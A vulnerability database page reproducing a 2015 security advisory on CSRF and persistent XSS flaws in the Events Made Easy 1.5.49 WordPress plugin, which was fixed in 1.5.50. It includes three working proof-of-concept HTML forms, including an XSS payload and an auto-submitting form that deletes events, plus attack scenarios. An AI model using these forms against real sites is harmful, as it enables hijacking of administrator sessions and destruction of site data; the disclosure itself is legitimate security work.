Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Events Made Easy 1.5.49 CSRF / XSS

🗓️ 17 Oct 2015 00:00:00Reported by David SopasType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

Events Made Easy 1.5.49 CSRF / XSS vulnerabilit

Code
`Plugin link: https://wordpress.org/plugins/events-made-easy/  
Active Installs: 10,000+  
Version tested: 1.5.49  
CVE Reference: Waiting  
Original advisory:  
https://www.davidsopas.com/events-made-easy-wordpress-plugin-csrf-persistent-xss/  
  
Events Made Easy is a full-featured event management solution for  
WordPress. Events Made Easy supports public, private, draft and  
recurring events, locations management, RSVP (+ optional approval),  
Paypal, 2Checkout, FirstData and Google maps. With Events Made Easy  
you can plan and publish your event, or let people reserve spaces for  
your weekly meetings. You can add events list, calendars and  
description to your blog using multiple sidebar widgets or shortcodes;  
if you are a web designer you can simply employ the template tags  
provided by Events Made Easy.  
  
When playing around with this plugin I noticed a couple of  
vulnerabilities. In my opinion they are critical because they can  
could cause damage to a WordPress installation.  
All of them are related to CSRF where the vendor forgot to place a  
security token (wp_nonce) on the affected forms.  
  
#1 Add template CSRF + Persistent XSS  
  
URL: /wp-admin/admin.php?page=eme-templates  
  
If a authenticated admin clicks on the “Add template” button on a html  
with this code:  
  
<form action="https://victims_website/wp-admin/admin.php?page=eme-templates"  
method="POST">  
<input type="hidden" name="eme_admin_action" value="do_addtemplate" />  
<input type="hidden" name="description" value="<svg/onload=confirm(1)>" />  
<input type="hidden" name="format" value="csrf" />  
<input type="submit" name="submit" value="Add template" />  
</form>  
  
It will add a Persistent XSS vector on the template description field.  
This field is automatically executed when the admin visits the page  
admin.php?page=eme-templates.  
  
Possible attack scenario:  
  
Malicious user checks that Events Made Easy is installed on a  
WordPress installation  
Malicious sends admin a link to the page that has a auto-submit  
form with a XSS vector that hijacks victims browser  
Victim visits the page and gets hijacked  
  
#2 Add Form Field CSRF + Persistent XSS  
  
URL: /wp-admin/admin.php?page=eme-formfields  
  
If a authenticated admin clicks on the “Add field” button on a html  
with this code:  
  
<form action="https://victims_website/wp-admin/admin.php?page=eme-formfields"  
method="POST">  
<input type="hidden" name="eme_admin_action" value="do_addformfield" />  
<input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />  
<input type="hidden" name="field_type" value="1" />  
<input type="hidden" name="field_info" value="csrf" />  
<input type="hidden" name="field_tags" value="csrf" />  
<input type="submit" name="submit" value="Add field" />  
</form>  
  
Like vulnerability #1 the attack scenario is the same. Same issue  
affects form fields on this plugin.  
  
#3 Remove events older than CSRF  
  
URL: /wp-admin/admin.php?page=eme-cleanup  
  
With this CSRF a malicious user could delete all the events older than  
a certain number.  
In my proof of concept I used a auto-submit form that could also be  
used in vulnerabilities #1 and #2.  
  
<form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup"  
name="dsopas" method="POST">  
<input type="hidden" name="page" value="eme-cleanup" />  
<input type="hidden" name="eme_admin_action" value="eme_cleanup" />  
<input type="hidden" name="eme_number" value="1" />  
<input type="hidden" name="eme_period" value="day" />  
<input type="hidden" name="doaction" value="Apply" />  
</form> <script> document.dsopas.submit(); </script>  
  
Possible attack scenario:  
  
Malicious user checks that Events Made Easy is installed on a  
WordPress installation  
Malicious sends admin a link to the page that has this auto-submit form  
Without victim noticing, events older than 1 day will be removed.  
  
Solution:  
Vendor in a matter of few hours launched a patched version – 1.5.50.  
Also he was kind enough to put my name on the changelog.  
  
-David Sopas  
davidsopas.com  
@dsopas  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Oct 2015 00:00Current
7.4High risk
Vulners AI Score7.4
wordpressevents made easycsrfxsssecurityvulnerabilityadminform fieldpersistentmalicious user
30